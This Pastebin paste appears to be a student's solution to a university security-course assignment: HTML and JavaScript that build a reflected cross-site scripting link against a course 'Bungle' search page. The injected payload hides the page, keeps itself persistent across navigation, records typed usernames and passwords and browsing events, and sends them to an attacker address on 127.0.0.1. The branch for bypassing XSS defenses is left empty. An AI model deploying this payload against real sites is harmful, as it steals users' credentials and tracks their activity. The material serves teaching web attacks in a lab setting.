Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
- function payload(a){function b(b){console.log($.param(b)),$.get(a,b)}function c(){$("html").show(),$("#bungle-lnk").removeAttr("href"),$("#bungle-lnk").click(function(){d("/","/"!=history.state.url)}),$("#search-again-btn").removeAttr("href"),$("#search-again-btn").click(function(){d("/",!0)}),$(".history-item").each(function(){var a=$(this).attr("href");$(this).removeAttr("href"),$(this).click(function(){d(a,!0)})}),$("#search-btn").click(function(a){a.preventDefault();var b=$("#query").val();$.ajax({url:"./search",data:{q:b},type:"GET",success:function(a){$("html").html(a),d("search?q="+b,!0)}})}),$("#log-in-btn").click(function(a){a.preventDefault();var c=$("#username").val(),e=$("#userpass").val();b({event:"login",user:c,pass:e}),console.log("setting cu to "+c),cu=c,$.ajax({url:"./login",data:{username:c,password:e},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})}),$("#log-out-btn").click(function(a){a.preventDefault(),b({event:"logout",user:cu}),cu="",$.ajax({url:"./logout",data:{},type:"POST",success:function(a){$("html").html(a),history.replaceState({url:"/",html:$("html").html()},"","/"),d("/",!1)}})})}function d(a,d){var e="http://cos432-assn3.cs.princeton.edu/"+encodeURIComponent(a);b({event:"nav",user:cu,url:e}),d?$("html").load(a,function(){c(),history.pushState({url:a,html:$("html").html()},"",a)}):($("html").html(history.state.html),c())}$("html").hide(),$(document).ready(function(){var e=document.createElement("script");e.type="text/javascript",e.text="var attacker = '"+a+'\';\nvar cu = "";\n'+d.toString()+"\n"+b.toString()+"\n"+c.toString(),$("html").append(e),window.onpopstate=function(a){d(a.state.url,!1)},history.replaceState(null,"","/"),$("html").load("/",function(){c(),history.replaceState({url:"/",html:$("html").html()},"","/")})})}
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";" + payload.name + "(\"" + attacker + "\");<\/script" + ">");
- } else { // Implement code to defeat XSS defenses here.
- }
- }
- var xssdefense = 0;
- var target = "http://cos432-assn3.cs.princeton.edu";
- var attacker = "http://127.0.0.1:31337/stolen";
- $(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- </script>
- <h3>parse error</h3>
Add Comment
Please, Sign In to add comment
